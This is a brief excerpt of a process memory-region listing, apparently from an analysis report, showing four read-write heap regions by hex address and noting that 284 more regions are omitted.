1E9B2830000
|
heap
|
page read and write
|
||
1400DC1D000
|
heap
|
page read and write
|
||
1400BC2C000
|
heap
|
page read and write
|
||
1E9B23A6000
|
heap
|
page read and write
|
There are 284 more memory regions that this listing does not show.